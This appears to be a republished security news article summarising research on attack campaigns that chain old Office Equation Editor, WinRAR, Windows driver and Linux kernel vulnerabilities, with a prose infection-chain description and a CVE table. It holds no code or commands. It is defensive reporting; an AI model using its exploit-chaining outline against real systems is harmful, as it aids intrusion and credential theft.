Cybersecurity teams worldwide have observed a surge in sophisticated campaigns exploiting both Windows and Linux vulnerabilities in recent months to achieve unauthorized system access.
These attacks often begin with phishing emails or malicious web content designed to deliver weaponized documents. Once opened, the embedded exploits target unpatched vulnerabilities in commonly used software components, allowing attackers to execute arbitrary code on victim machines.
As organizations struggle to keep pace with patch management, threat actors have intensified their focus on high-impact flaws that remain unaddressed in many environments.
Securelist researchers identified that several long-standing vulnerabilities in Microsoft Office’s Equation Editor continue to be a favorite initial access vector.
CVE-2018-0802 and CVE-2017-11882, both remote code execution flaws in the Equation Editor component, remain heavily exploited despite patches being available for years.
In addition, CVE-2017-0199, a flaw affecting Office and WordPad, provides another path for payload delivery.
These Office exploits are often combined with more recent Windows File Explorer and driver vulnerabilities—such as CVE-2025-24071, which enables NetNTLM credential theft via .library-ms files, and CVE-2024-35250, a ks.sys driver code execution issue—to establish a foothold and escalate privileges.
Beyond Microsoft Office, attackers have also leveraged WinRAR’s archive-handling weaknesses. CVE-2023-38831 and the directory traversal flaw CVE-2025-6218 allow adversaries to place malicious files outside the intended extraction path, hijacking system configurations or dropping persistence backdoors.
On the Linux side, the Dirty Pipe vulnerability (CVE-2022-0847) remains a critical favorite for privilege escalation, while CVE-2019-13272 and CVE-2021-22555 continue to be used to gain root access on unpatched servers.
Infection Mechanism
A particularly insidious infection mechanism combines Office-based delivery with secondary exploitation of system drivers. Securelist analysts noted that attackers craft RTF documents containing shellcode that invokes Equation Editor through OLE objects.
Once the vulnerability triggers, shellcode downloads a two-stage payload: a small loader and a full-featured malware binary.
The loader leverages CVE-2025-24071 to harvest NetNTLM hashes from incoming SMB connections, forwarding them to a C2 server.
The full payload then exploits CVE-2024-35250 to load a malicious driver into kernel space, granting attackers unrestricted code execution.
This dual-exploit chain allows adversaries to bypass user-level defenses and deploy rootkits undetected.
.webp "Threat Actors Leveraging Windows and Linux Vulnerabilities in Real-world Attacks to Gain System Access 3")
In many incidents, once kernel-level control is achieved, attackers install custom C2 frameworks—such as Sliver or Havoc—to maintain persistence.
These implants include in-memory protection to evade antivirus scans and use legitimate Windows services to blend into normal processes.
By chaining publicly known exploits, actors can rapidly move from initial compromise to full system control without writing suspicious files to disk.
Vulnerability Details:-
| CVE | Description | Exploit Type | Affected Platform |
|---|---|---|---|
| CVE-2018-0802 | RCE in Office Equation Editor | Embedded OLE exploit | Windows |
| CVE-2017-11882 | RCE in Office Equation Editor | Embedded OLE exploit | Windows |
| CVE-2017-0199 | Control takeover via Office and WordPad | Script-based document exploit | Windows |
| CVE-2023-38831 | Improper file handling in WinRAR | Archive code execution | Windows |
| CVE-2025-24071 | NetNTLM credential theft via .library-ms files | Credential dumping | Windows |
| CVE-2024-35250 | Arbitrary code execution in ks.sys driver | Kernel driver exploit | Windows |
| CVE-2022-0847 | Dirty Pipe privilege escalation | Pipe buffer overwrite | Linux |
| CVE-2019-13272 | Improper privilege inheritance handling | Privilege escalation | Linux |
| CVE-2021-22555 | Heap overflow in Netfilter | Heap-based overflow | Linux |
| CVE-2025-6218 | Directory traversal in WinRAR | Archive path manipulation | Windows |
This consolidated view highlights the persistence of older vulnerabilities alongside newer flaws, underscoring the critical need for timely patching and comprehensive defense-in-depth strategies.
Organizations should prioritize updates for both user applications and system components to mitigate the risk of these prevalent exploits in real-world attacks.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
